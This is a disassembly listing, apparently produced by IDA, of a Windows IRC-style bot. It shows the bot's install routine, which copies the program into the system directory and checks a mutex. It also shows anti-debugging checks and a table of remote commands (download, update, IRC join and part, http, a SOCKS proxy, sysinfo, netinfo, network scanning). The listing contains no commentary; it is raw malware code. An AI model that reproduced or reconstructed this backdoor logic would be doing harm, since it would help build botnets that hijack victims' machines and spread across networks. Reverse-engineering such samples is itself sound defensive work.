		mov	ecx, [ebp+var_4]
		xor	ecx, ebp
		mov	eax, esi
		call	sub_402AD0
		leave
		retn	4
sub_41C22E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41C28D	proc near		; CODE XREF: sub_4044D2-6Ep

var_76C		= dword	ptr -76Ch
var_768		= dword	ptr -768h
var_764		= byte ptr -764h
var_750		= dword	ptr -750h
var_740		= dword	ptr -740h
var_728		= dword	ptr -728h
var_6BC		= byte ptr -6BCh
var_510		= byte ptr -510h
var_50C		= byte ptr -50Ch
var_504		= byte ptr -504h
var_500		= byte ptr -500h
var_4FF		= byte ptr -4FFh
var_4EC		= byte ptr -4ECh
var_4C8		= byte ptr -4C8h
var_4B0		= byte ptr -4B0h
var_4A8		= byte ptr -4A8h
var_4A7		= byte ptr -4A7h
var_44C		= byte ptr -44Ch
var_440		= byte ptr -440h
var_430		= byte ptr -430h
var_428		= byte ptr -428h
var_427		= byte ptr -427h
var_344		= byte ptr -344h
var_338		= byte ptr -338h
var_328		= byte ptr -328h
var_320		= byte ptr -320h
var_31F		= byte ptr -31Fh
var_238		= byte ptr -238h
var_230		= byte ptr -230h
var_22F		= byte ptr -22Fh
var_118		= byte ptr -118h
var_110		= byte ptr -110h
var_10F		= byte ptr -10Fh
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 72Ch
		mov	eax, dword_423064
		xor	eax, esp
		mov	[esp+72Ch+var_4], eax
		mov	eax, [ebp+arg_8]
		push	ebx
		push	esi
		push	edi
		mov	[esp+738h+var_728], eax
		call	sub_419E67
		test	al, al
		jz	short loc_41C2D3

loc_41C2BA:				; CODE XREF: sub_41C28D+1BFj
					; sub_41C28D+1EAj ...
		mov	ecx, [esp+738h+var_4]
		pop	edi
		pop	esi
		pop	ebx
		xor	ecx, esp
		xor	eax, eax
		call	sub_402AD0
		mov	esp, ebp
		pop	ebp
		retn	10h
; ---------------------------------------------------------------------------

loc_41C2D3:				; CODE XREF: sub_41C28D+2Bj
		call	sub_419DDC
		test	al, al
		jnz	loc_41C735
		call	ds:off_41D08C
		test	eax, eax
		jnz	loc_41C735
		mov	esi, offset aInstall ; "--install "
		lea	edi, [esp+738h+var_4EC]
		movsd
		movsd
		movsw
		movsb
		mov	edi, 103h
		xor	ebx, ebx
		push	edi
		lea	eax, [esp+73Ch+var_10F]
		push	ebx
		push	eax
		mov	[esp+744h+var_110], bl
		call	sub_407F20
		add	esp, 0Ch
		push	edi
		lea	eax, [esp+73Ch+var_31F]
		push	ebx
		push	eax
		mov	[esp+744h+var_320], bl
		call	sub_407F20
		add	esp, 0Ch
		push	edi
		lea	eax, [esp+73Ch+var_427]
		push	ebx
		push	eax
		mov	[esp+744h+var_428], bl
		call	sub_407F20
		add	esp, 0Ch
		push	7Fh
		lea	eax, [esp+73Ch+var_4A7]
		push	ebx
		push	eax
		mov	[esp+744h+var_4A8], bl
		call	sub_407F20
		add	esp, 0Ch
		push	edi
		lea	eax, [esp+73Ch+var_110]
		push	eax
		call	ds:dword_41D0F0	; GetSystemDirectoryA
		push	80h
		lea	esi, [esp+744h+var_4B0]
		mov	ebx, offset byte_426671
		call	sub_419EC1
		pop	ecx
		mov	eax, esi
		push	eax
		lea	eax, [esp+744h+var_118]
		push	eax
		push	offset aSS_6	; "%s\\%s"
		lea	eax, [esp+74Ch+var_430]
		push	edi
		push	eax
		call	sub_402EAE
		lea	eax, [esp+754h+var_430]
		add	esp, 14h
		lea	ecx, [eax+1]

loc_41C3BC:				; CODE XREF: sub_41C28D+134j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_41C3BC
		sub	eax, ecx
		xor	ebx, ebx
		mov	[esp+eax+740h+var_430],	bl
		mov	esi, 104h
		push	esi
		lea	eax, [esp+744h+var_328]
		push	eax
		push	ebx
		call	ds:dword_41D0E0	; GetModuleHandleA
		push	eax
		call	ds:dword_41D060	; GetModuleFileNameA
		lea	eax, [esp+750h+var_504]
		lea	ecx, [eax+1]

loc_41C3F4:				; CODE XREF: sub_41C28D+16Cj
		mov	dl, [eax]
		inc	eax
		cmp	dl, bl
		jnz	short loc_41C3F4
		sub	eax, ecx
		push	eax
		lea	eax, [esp+754h+var_504]
		push	eax
		push	[esp+758h+var_740]
		call	sub_402DA9
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_41C47C
		push	esi
		lea	eax, [esp+754h+var_440]
		push	eax
		lea	eax, [esp+758h+var_338]
		push	eax
		call	sub_402DA9
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_41C47C
		push	ebx
		lea	eax, [esp+754h+var_440]
		push	eax
		lea	eax, [esp+758h+var_338]
		push	eax
		call	ds:off_41D080
		test	eax, eax
		jz	loc_41C2BA
		lea	eax, [esp+75Ch+var_344]
		push	eax
		lea	eax, [esp+760h+var_510]
		push	eax
		lea	eax, [esp+764h+var_44C]
		push	eax
		push	offset aSSS_0	; "%s %s%s"
		call	sub_419A09
		add	esp, 10h
		jmp	loc_41C2BA
; ---------------------------------------------------------------------------

loc_41C47C:				; CODE XREF: sub_41C28D+187j
					; sub_41C28D+1A4j
		lea	eax, [esp+750h+var_504]
		lea	edx, [eax+1]

loc_41C486:				; CODE XREF: sub_41C28D+1FEj
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41C486
		sub	eax, edx
		push	eax
		lea	eax, [esp+754h+var_504]
		push	eax
		push	[esp+758h+var_740]
		call	sub_402DA9
		add	esp, 0Ch
		test	eax, eax
		jnz	loc_41C552
		push	esi
		lea	eax, [esp+754h+var_440]
		push	eax
		lea	eax, [esp+758h+var_338]
		push	eax
		call	sub_402DA9
		add	esp, 0Ch
		test	eax, eax
		jnz	loc_41C552
		push	edi
		lea	eax, [esp+754h+var_22F]
		push	ebx
		push	eax
		mov	[esp+75Ch+var_230], bl
		call	sub_407F20
		lea	eax, [esp+75Ch+var_504]
		add	esp, 0Ch
		lea	edi, [eax+1]

loc_41C4F0:				; CODE XREF: sub_41C28D+268j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41C4F0
		mov	ecx, [esp+750h+var_740]
		sub	eax, edi
		add	eax, ecx
		push	eax
		push	offset aS_11	; "%s"
		lea	eax, [esp+758h+var_230]
		push	esi
		push	eax
		call	sub_402EAE
		add	esp, 10h
		xor	edi, edi

loc_41C518:				; CODE XREF: sub_41C28D+2ACj
		lea	eax, [esp+750h+var_230]
		push	eax
		call	ds:off_41D0CC
		test	eax, eax
		jnz	short loc_41C53B
		push	0C8h
		call	ds:off_41D0F8
		inc	edi
		cmp	edi, 3
		jb	short loc_41C518

loc_41C53B:				; CODE XREF: sub_41C28D+29Bj
		push	esi
		lea	eax, [esp+75Ch+var_238]
		push	ebx
		push	eax
		call	sub_407F20
		add	esp, 0Ch
		call	sub_41C135

loc_41C552:				; CODE XREF: sub_41C28D+219j
					; sub_41C28D+23Aj
		push	80h
		lea	eax, [esp+75Ch+var_4C8]
		push	ebx
		push	eax
		call	sub_407F20
		add	esp, 0Ch
		push	37h
		lea	eax, [esp+75Ch+var_4FF]
		push	ebx
		push	eax
		mov	[esp+764h+var_500], bl
		call	sub_407F20
		add	esp, 0Ch
		push	38h
		lea	esi, [esp+75Ch+var_500]
		mov	ebx, offset asc_4266F1 ; "ÅËÜÀËÜÀ˽·½"
		call	sub_419EC1
		pop	ecx
		mov	eax, esi
		push	eax
		push	1
		xor	ebx, ebx
		push	ebx
		call	ds:off_41D084
		push	38h
		mov	esi, eax
		lea	eax, [esp+768h+var_50C]
		push	ebx
		push	eax
		call	sub_407F20
		add	esp, 0Ch
		push	1388h
		push	esi
		call	ds:off_41D07C
		cmp	eax, 102h
		jnz	short loc_41C5D3
		push	ebx
		call	ds:off_41D050

loc_41C5D3:				; CODE XREF: sub_41C28D+33Dj
		call	sub_417776
		push	8
		call	sub_40340B
		cmp	eax, ebx
		pop	ecx
		jz	short loc_41C5F7
		push	offset sub_417909
		xor	ecx, ecx
		mov	edi, offset aRm	; "RM"
		mov	esi, eax
		call	sub_414884

loc_41C5F7:				; CODE XREF: sub_41C28D+355j
		lea	eax, [esp+770h+var_750]
		push	eax
		mov	[esp+774h+var_750], 94h
		call	ds:dword_41D068	; GetVersionExA
		cmp	[esp+774h+var_750], 4
		jz	short loc_41C630
		push	8
		call	sub_40340B
		cmp	eax, ebx
		pop	ecx
		jz	short loc_41C630
		push	offset sub_41A690
		xor	ecx, ecx
		mov	edi, offset aBk	; "BK"
		mov	esi, eax
		call	sub_414884

loc_41C630:				; CODE XREF: sub_41C28D+382j
					; sub_41C28D+38Ej
		push	8
		mov	byte_428000, bl
		call	sub_40340B
		cmp	eax, ebx
		pop	ecx
		jz	short loc_41C655
		push	offset sub_418AF1
		xor	ecx, ecx
		mov	edi, offset aUnm ; "UNM"
		mov	esi, eax
		call	sub_414884

loc_41C655:				; CODE XREF: sub_41C28D+3B3j
		lea	eax, [esp+774h+var_6BC]
		push	eax
		push	202h
		call	ds:dword_41D274	; WSAStartup
		test	eax, eax
		jnz	loc_41C72A
		call	sub_419AEB
		mov	byte_434F8D, bl
		call	sub_41BD26
		mov	eax, [ebp+arg_0]
		mov	byte_427EF4, bl
		mov	dword_427CE4, eax
		call	sub_419507
		mov	eax, dword_435290
		mov	eax, [eax]
		mov	ebx, offset dword_43528C
		mov	[esp+77Ch+var_768], eax
		mov	[esp+77Ch+var_76C], ebx

loc_41C6A7:				; CODE XREF: sub_41C28D+445j
		cmp	[esp+77Ch+var_76C], 0
		mov	esi, dword_435290
		jz	short loc_41C6BA
		cmp	[esp+77Ch+var_76C], ebx
		jz	short loc_41C6BF

loc_41C6BA:				; CODE XREF: sub_41C28D+425j
		call	sub_40331D

loc_41C6BF:				; CODE XREF: sub_41C28D+42Bj
		cmp	[esp+77Ch+var_768], esi
		jz	short loc_41C6D4
		lea	edi, [esp+77Ch+var_764]
		lea	esi, [esp+77Ch+var_76C]
		call	sub_40168C
		jmp	short loc_41C6A7
; ---------------------------------------------------------------------------

loc_41C6D4:				; CODE XREF: sub_41C28D+436j
		mov	edi, offset dword_427FFC

loc_41C6D9:				; CODE XREF: sub_41C28D+49Bj
		push	2
		mov	esi, offset dword_425E30
		pop	ebx

loc_41C6E1:				; CODE XREF: sub_41C28D+499j
		movsx	eax, word ptr [esi+200h]
		push	eax
		push	esi
		lea	edx, [esi-200h]
		mov	ecx, edi
		call	sub_41881F
		test	al, al
		jz	short loc_41C70D
		mov	byte_428000, 1

loc_41C702:				; CODE XREF: sub_41C28D+47Ej
		mov	ecx, edi
		call	sub_4186F1
		test	al, al
		jnz	short loc_41C702

loc_41C70D:				; CODE XREF: sub_41C28D+46Cj
		push	3A98h
		mov	byte_428000, 0
		call	ds:off_41D0F8
		add	esi, 402h
		dec	ebx
		jnz	short loc_41C6E1
		jmp	short loc_41C6D9
; ---------------------------------------------------------------------------

loc_41C72A:				; CODE XREF: sub_41C28D+3DDj
		call	ds:dword_41D240	; WSACleanup
		jmp	loc_41C2BA
; ---------------------------------------------------------------------------

loc_41C735:				; CODE XREF: sub_41C28D+4Dj
					; sub_41C28D+5Bj
		push	offset byte_41EF27
		call	sub_419C67
		int	3		; Trap to Debugger
sub_41C28D	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_41C740	proc near		; CODE XREF: sub_419590+2Fp
					; sub_419590+6Cp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

		push	edi
		push	esi
		push	ebx
		xor	edi, edi
		mov	eax, [esp+0Ch+arg_4]
		or	eax, eax
		jge	short loc_41C761
		inc	edi
		mov	edx, [esp+0Ch+arg_0]
		neg	eax
		neg	edx
		sbb	eax, 0
		mov	[esp+0Ch+arg_4], eax
		mov	[esp+0Ch+arg_0], edx

loc_41C761:				; CODE XREF: sub_41C740+Bj
		mov	eax, [esp+0Ch+arg_C]
		or	eax, eax
		jge	short loc_41C77D
		inc	edi
		mov	edx, [esp+0Ch+arg_8]
		neg	eax
		neg	edx
		sbb	eax, 0
		mov	[esp+0Ch+arg_C], eax
		mov	[esp+0Ch+arg_8], edx

loc_41C77D:				; CODE XREF: sub_41C740+27j
		or	eax, eax
		jnz	short loc_41C799
		mov	ecx, [esp+0Ch+arg_8]
		mov	eax, [esp+0Ch+arg_4]
		xor	edx, edx
		div	ecx
		mov	ebx, eax
		mov	eax, [esp+0Ch+arg_0]
		div	ecx
		mov	edx, ebx
		jmp	short loc_41C7DA
; ---------------------------------------------------------------------------

loc_41C799:				; CODE XREF: sub_41C740+3Fj
		mov	ebx, eax
		mov	ecx, [esp+0Ch+arg_8]
		mov	edx, [esp+0Ch+arg_4]
		mov	eax, [esp+0Ch+arg_0]

loc_41C7A7:				; CODE XREF: sub_41C740+71j
		shr	ebx, 1
		rcr	ecx, 1
		shr	edx, 1
		rcr	eax, 1
		or	ebx, ebx
		jnz	short loc_41C7A7
		div	ecx
		mov	esi, eax
		mul	[esp+0Ch+arg_C]
		mov	ecx, eax
		mov	eax, [esp+0Ch+arg_8]
		mul	esi
		add	edx, ecx
		jb	short loc_41C7D5
		cmp	edx, [esp+0Ch+arg_4]
		ja	short loc_41C7D5
		jb	short loc_41C7D6
		cmp	eax, [esp+0Ch+arg_0]
		jbe	short loc_41C7D6

loc_41C7D5:				; CODE XREF: sub_41C740+85j
					; sub_41C740+8Bj
		dec	esi

loc_41C7D6:				; CODE XREF: sub_41C740+8Dj
					; sub_41C740+93j
		xor	edx, edx
		mov	eax, esi

loc_41C7DA:				; CODE XREF: sub_41C740+57j
		dec	edi
		jnz	short loc_41C7E4
		neg	edx
		neg	eax
		sbb	edx, 0

loc_41C7E4:				; CODE XREF: sub_41C740+9Bj
		pop	ebx
		pop	esi
		pop	edi
		retn	10h
sub_41C740	endp

; ---------------------------------------------------------------------------
		align 10h
		cmp	dword_4352E0, 0
		jz	short sub_41C826

loc_41C7F9:				; CODE XREF: .text:0041C824j
		push	ebp
		mov	ebp, esp
		sub	esp, 8
		and	esp, 0FFFFFFF8h
		fstp	qword ptr [esp]
		cvttsd2si eax, qword ptr [esp]
		leave
		retn
; ---------------------------------------------------------------------------
		cmp	dword_4352E0, 0
		jz	short sub_41C826
		sub	esp, 4
		fnstcw	word ptr [esp]
		pop	eax
		and	ax, 7Fh
		cmp	ax, 7Fh
		jz	short loc_41C7F9

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41C826	proc near		; CODE XREF: sub_41AFA7+593p
					; .text:0041C7F7j ...

var_20		= dword	ptr -20h
var_10		= qword	ptr -10h
var_8		= dword	ptr -8

		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		and	esp, 0FFFFFFF0h
		fld	st
		fst	[esp+20h+var_8]
		fistp	[esp+20h+var_10]
		fild	[esp+20h+var_10]
		mov	edx, [esp+20h+var_8]
		mov	eax, dword ptr [esp+20h+var_10]
		test	eax, eax
		jz	short loc_41C885

loc_41C849:				; CODE XREF: sub_41C826+69j
		fsubp	st(1), st
		test	edx, edx
		jns	short loc_41C86D
		fstp	[esp+20h+var_20]
		mov	ecx, [esp+20h+var_20]
		xor	ecx, 80000000h
		add	ecx, 7FFFFFFFh
		adc	eax, 0
		mov	edx, dword ptr [esp+20h+var_10+4]
		adc	edx, 0
		jmp	short locret_41C899
; ---------------------------------------------------------------------------

loc_41C86D:				; CODE XREF: sub_41C826+27j
		fstp	[esp+20h+var_20]
		mov	ecx, [esp+20h+var_20]
		add	ecx, 7FFFFFFFh
		sbb	eax, 0
		mov	edx, dword ptr [esp+20h+var_10+4]
		sbb	edx, 0
		jmp	short locret_41C899
; ---------------------------------------------------------------------------

loc_41C885:				; CODE XREF: sub_41C826+21j
		mov	edx, dword ptr [esp+20h+var_10+4]
		test	edx, 7FFFFFFFh
		jnz	short loc_41C849
		fstp	[esp+20h+var_8]
		fstp	[esp+20h+var_8]

locret_41C899:				; CODE XREF: sub_41C826+45j
					; sub_41C826+5Dj
		leave
		retn
sub_41C826	endp

; ---------------------------------------------------------------------------
		lea	ecx, [ebp-28h]
		jmp	loc_401137
; ---------------------------------------------------------------------------

loc_41C8A3:				; DATA XREF: sub_402A3A+2o
					; sub_402A79+2o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-54h]
		xor	ecx, eax
		call	sub_402AD0
		mov	eax, offset dword_4215C8
		jmp	sub_40463E
; ---------------------------------------------------------------------------

loc_41C8BE:				; DATA XREF: sub_40B863+2o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-14h]
		xor	ecx, eax
		call	sub_402AD0
		mov	eax, offset dword_421968
		jmp	sub_40463E

; =============== S U B	R O U T	I N E =======================================



sub_41C8D9	proc near		; CODE XREF: sub_408412+14p
					; DATA XREF: sub_401442+2o

arg_4		= dword	ptr  8

		mov	edx, [esp+arg_4]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-1Ch]
		xor	ecx, eax
		call	sub_402AD0
		mov	eax, offset dword_421E20
		jmp	sub_40463E
sub_41C8D9	endp

; ---------------------------------------------------------------------------
		mov	ecx, [ebp-10h]
		jmp	sub_40308A
; ---------------------------------------------------------------------------

loc_41C8FC:				; DATA XREF: sub_401065+2o
					; sub_4013E6+2o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-14h]
		xor	ecx, eax
		call	sub_402AD0
		mov	eax, offset dword_421E50
		jmp	sub_40463E
; ---------------------------------------------------------------------------
		lea	ecx, [ebp-2Ch]
		jmp	loc_401137
; ---------------------------------------------------------------------------

loc_41C91F:				; DATA XREF: sub_4016BA+2o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-58h]
		xor	ecx, eax
		call	sub_402AD0
		mov	eax, offset dword_421E80
		jmp	sub_40463E
; ---------------------------------------------------------------------------
		push	dword ptr [ebp-10h]
		call	sub_40332D
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41C944:				; DATA XREF: sub_41BD26+2o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-14h]
		xor	ecx, eax
		call	sub_402AD0
		mov	eax, offset dword_421D10
		jmp	sub_40463E
; ---------------------------------------------------------------------------
		push	dword ptr [ebp-10h]
		call	sub_40332D
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41C969:				; DATA XREF: sub_419507+2o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-14h]
		xor	ecx, eax
		call	sub_402AD0
		mov	eax, offset dword_421D3C
		jmp	sub_40463E
; ---------------------------------------------------------------------------
		push	dword ptr [ebp-154h]
		call	sub_40332D
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41C991:				; DATA XREF: sub_4145BE+8o
		mov	edx, [esp+8]
		lea	eax, [edx-154h]
		mov	ecx, [edx-158h]
		xor	ecx, eax
		call	sub_402AD0
		add	eax, 8
		mov	ecx, [edx-8]
		xor	ecx, eax
		call	sub_402AD0
		mov	eax, offset dword_421D68
		jmp	sub_40463E
; ---------------------------------------------------------------------------
		push	dword ptr [ebp-33Ch]
		call	sub_40332D
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41C9CC:				; DATA XREF: sub_41C135+5o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-344h]
		xor	ecx, eax
		call	sub_402AD0
		mov	ecx, [edx-4]
		xor	ecx, eax
		call	sub_402AD0
		mov	eax, offset dword_421D94
		jmp	sub_40463E
; ---------------------------------------------------------------------------
		lea	ecx, [ebp-28h]
		jmp	loc_401137
; ---------------------------------------------------------------------------

loc_41C9FC:				; DATA XREF: sub_40121E+2o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-54h]
		xor	ecx, eax
		call	sub_402AD0
		mov	eax, offset dword_421EB0
		jmp	sub_40463E
; ---------------------------------------------------------------------------
		push	dword ptr [ebp-58h]
		call	sub_40332D
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41CA21:				; DATA XREF: sub_4022D6+2o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-70h]
		xor	ecx, eax
		call	sub_402AD0
		mov	ecx, [edx-4]
		xor	ecx, eax
		call	sub_402AD0
		mov	eax, offset dword_421EE0
		jmp	sub_40463E
; ---------------------------------------------------------------------------
		push	dword ptr [ebp-13Ch]
		call	sub_40332D
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41CA53:				; DATA XREF: sub_401E4A+8o
		mov	edx, [esp+8]
		lea	eax, [edx-13Ch]
		mov	ecx, [edx-140h]
		xor	ecx, eax
		call	sub_402AD0
		add	eax, 0Ch
		mov	ecx, [edx-8]
		xor	ecx, eax
		call	sub_402AD0
		mov	eax, offset dword_421F10
		jmp	sub_40463E
; ---------------------------------------------------------------------------
		push	dword ptr [ebp-4BCh]
		call	sub_40332D
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41CA8E:				; DATA XREF: sub_4019F3+5o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-4C8h]
		xor	ecx, eax
		call	sub_402AD0
		mov	ecx, [edx-4]
		xor	ecx, eax
		call	sub_402AD0
		mov	eax, offset dword_421F40
		jmp	sub_40463E
; ---------------------------------------------------------------------------
		push	dword ptr [ebp-4C0h]
		call	sub_40332D
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41CAC3:				; DATA XREF: sub_40177B+5o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-4C8h]
		xor	ecx, eax
		call	sub_402AD0
		mov	ecx, [edx-4]
		xor	ecx, eax
		call	sub_402AD0
		mov	eax, offset dword_421F70
		jmp	sub_40463E
; ---------------------------------------------------------------------------

loc_41CAEB:				; DATA XREF: _1fieagrn:0041D28Co
		call	sub_401291
		and	dword_435294, 0
		push	offset loc_41CC9F
		mov	dword_435290, eax
		call	sub_4031E1
		pop	ecx
		retn
; ---------------------------------------------------------------------------
		call	sub_40172D
		and	dword_4352A0, 0
		push	offset loc_41CCE8
		mov	dword_43529C, eax
		call	sub_4031E1
		pop	ecx
		retn
; ---------------------------------------------------------------------------
		push	esi
		push	offset aDownload ; "download"
		mov	esi, offset off_4352A8
		call	sub_41C22E
		mov	off_4352A8, offset off_420B94
		pop	esi
		retn
; ---------------------------------------------------------------------------
		push	esi
		push	offset aUpdate	; "update"
		mov	esi, offset off_4352A4
		call	sub_41C22E
		mov	off_4352A4, offset off_420B9C
		pop	esi
		retn
; ---------------------------------------------------------------------------
		push	esi
		push	offset aI_quit	; "i.quit"
		mov	esi, offset off_4352B4
		call	sub_41C22E
		mov	off_4352B4, offset off_420C10
		pop	esi
		retn
; ---------------------------------------------------------------------------
		push	esi
		push	offset aI_join	; "i.join"
		mov	esi, offset off_4352AC
		call	sub_41C22E
		mov	off_4352AC, offset off_420C18
		pop	esi
		retn
; ---------------------------------------------------------------------------
		push	esi
		push	offset aI_part	; "i.part"
		mov	esi, offset off_4352B0
		call	sub_41C22E
		mov	off_4352B0, offset off_420C20
		pop	esi
		retn
; ---------------------------------------------------------------------------
		push	esi
		push	offset aHttp	; "http"
		mov	esi, offset off_4352B8
		call	sub_41C22E
		mov	off_4352B8, offset off_420C38
		pop	esi
		retn
; ---------------------------------------------------------------------------
		push	esi
		push	offset aS4	; "s4"
		mov	esi, offset off_4352C0
		call	sub_41C22E
		mov	off_4352C0, offset off_420C84
		pop	esi
		retn
; ---------------------------------------------------------------------------
		push	esi
		push	offset aS4_stop	; "s4.stop"
		mov	esi, offset off_4352BC
		call	sub_41C22E
		mov	off_4352BC, offset off_420C8C
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41CC05:				; DATA XREF: _1fieagrn:0041D2B4o
		push	esi
		push	offset aSysinfo	; "sysinfo"
		mov	esi, offset off_4352C4
		call	sub_41C22E
		mov	off_4352C4, offset off_420D4C
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41CC21:				; DATA XREF: _1fieagrn:0041D2B8o
		push	esi
		push	offset aNetinfo	; "netinfo"
		mov	esi, offset off_4352C8
		call	sub_41C22E
		mov	off_4352C8, offset off_420D54
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41CC3D:				; DATA XREF: _1fieagrn:0041D2BCo
		mov	eax, dword_425824
		add	eax, 6
		mov	dword_4352CC, eax
		retn
; ---------------------------------------------------------------------------

loc_41CC4B:				; DATA XREF: _1fieagrn:0041D2C0o
		push	esi
		push	offset aScan_start ; "scan.start"
		mov	esi, offset off_4352D8
		call	sub_41C22E
		mov	off_4352D8, offset off_420EA4
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41CC67:				; DATA XREF: _1fieagrn:0041D2C4o
		push	esi
		push	offset aScan_stop ; "scan.stop"
		mov	esi, offset off_4352D0
		call	sub_41C22E
		mov	off_4352D0, offset off_420EAC
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41CC83:				; DATA XREF: _1fieagrn:0041D2C8o
		push	esi
		push	offset dword_41EF00
		mov	esi, offset off_4352D4
		call	sub_41C22E
		mov	off_4352D4, offset off_420EB4
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41CC9F:				; DATA XREF: .text:0041CAF7o
		mov	eax, dword_435290
		mov	ecx, [eax]
		mov	[eax], eax
		mov	eax, dword_435290
		mov	[eax+4], eax
		and	dword_435294, 0
		cmp	ecx, dword_435290
		jz	short loc_41CCD4
		push	esi

loc_41CCC0:				; CODE XREF: .text:0041CCD1j
		mov	esi, [ecx]
		push	ecx
		call	sub_40332D
		cmp	esi, dword_435290
		pop	ecx
		mov	ecx, esi
		jnz	short loc_41CCC0
		pop	esi

loc_41CCD4:				; CODE XREF: .text:0041CCBDj
		push	dword_435290
		call	sub_40332D
		and	dword_435290, 0
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41CCE8:				; DATA XREF: .text:0041CB14o
		mov	eax, dword_43529C
		mov	ecx, [eax]
		mov	[eax], eax
		mov	eax, dword_43529C
		mov	[eax+4], eax
		and	dword_4352A0, 0
		cmp	ecx, dword_43529C
		jz	short loc_41CD1D
		push	esi

loc_41CD09:				; CODE XREF: .text:0041CD1Aj
		mov	esi, [ecx]
		push	ecx
		call	sub_40332D
		cmp	esi, dword_43529C
		pop	ecx
		mov	ecx, esi
		jnz	short loc_41CD09
		pop	esi

loc_41CD1D:				; CODE XREF: .text:0041CD06j
		push	dword_43529C
		call	sub_40332D
		and	dword_43529C, 0
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41CD31:				; DATA XREF: sub_40340B+40o
		mov	dword_4270C4, offset off_41D324
		mov	ecx, offset dword_4270C4
		jmp	sub_40308A
; ---------------------------------------------------------------------------
		align 400h
_text		ends

; Section 2. (virtual address 0001D000)
; Virtual size			: 00006000 (  24576.)
; Section size in file		: 00006000 (  24576.)
; Offset to raw	data for section: 0001D000
; Flags	E0000060: Text Data Executable Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
_1fieagrn	segment	para public 'CODE' use32
		assume cs:_1fieagrn
		;org 41D000h
		assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dword_41D000	dd 77DD5C55h		; DATA XREF: sub_417722+39r
					; hvvrg7ie:004512DCr ...
off_41D004	dd offset sub_458FE7	; DATA XREF: sub_41764F+1Dr
					; sub_417722+1Br
off_41D008	dd offset sub_44BCAE	; DATA XREF: sub_4176BD+31r
off_41D00C	dd offset sub_43C0DE	; DATA XREF: sub_41764F+52r
dword_41D010	dd 77DD189Ah		; DATA XREF: sub_41764F+2Ar
					; sub_41764F+60r ...
off_41D014	dd offset sub_440B96	; DATA XREF: sub_41A025+3Cr
					; hvvrg7ie:0043C266r
off_41D018	dd offset sub_43BC7E	; DATA XREF: sub_41A45D+A5r
					; sub_41A45D+1B6r ...
off_41D01C	dd offset sub_45AB42	; DATA XREF: sub_419F50+82r
					; hvvrg7ie:0043D1FDr ...
off_41D020	dd offset sub_458E39	; DATA XREF: sub_41A28F+132r
					; sub_458E44-E8D4w ...
off_41D024	dd offset sub_448CB5	; DATA XREF: sub_41A40D+Cr
					; hvvrg7ie:00446690w ...
off_41D028	dd offset sub_4466A4	; DATA XREF: sub_419F50+24r
					; sub_453B74-9ED7w ...
off_41D02C	dd offset sub_449CB1	; DATA XREF: sub_4176BD+14r
					; sub_41A28F+90r ...
off_41D030	dd offset sub_439E5C	; DATA XREF: sub_41A690+299r
					; hvvrg7ie:00439E0Fw ...
off_41D034	dd offset sub_439E23	; DATA XREF: sub_41A025+19r
					; sub_439E23+5r ...
off_41D038	dd offset sub_45A2CE	; DATA XREF: sub_41A690+27Dr
					; sub_439D7Fw ...
off_41D03C	dd offset sub_43D569	; DATA XREF: sub_41A40D+2Er
					; sub_43D569+5r ...
off_41D040	dd offset sub_449E59	; DATA XREF: sub_41A40D+3Br
					; hvvrg7ie:0043AB42w ...
off_41D044	dd offset sub_440BF0	; DATA XREF: sub_41A40D+1Er
					; sub_440BF0+5r ...
off_41D048	dd offset sub_456AC9	; DATA XREF: sub_40207A+110r
					; hvvrg7ie:00439630w ...
		align 10h
off_41D050	dd offset sub_448663	; DATA XREF: sub_407C57+Er
					; sub_419C67+168r ...
off_41D054	dd offset sub_448871	; DATA XREF: sub_410661+22r
					; sub_41960F+29r ...
dword_41D058	dd 77E802FCh		; DATA XREF: sub_40B439+5Dr
					; sub_419590+Br ...
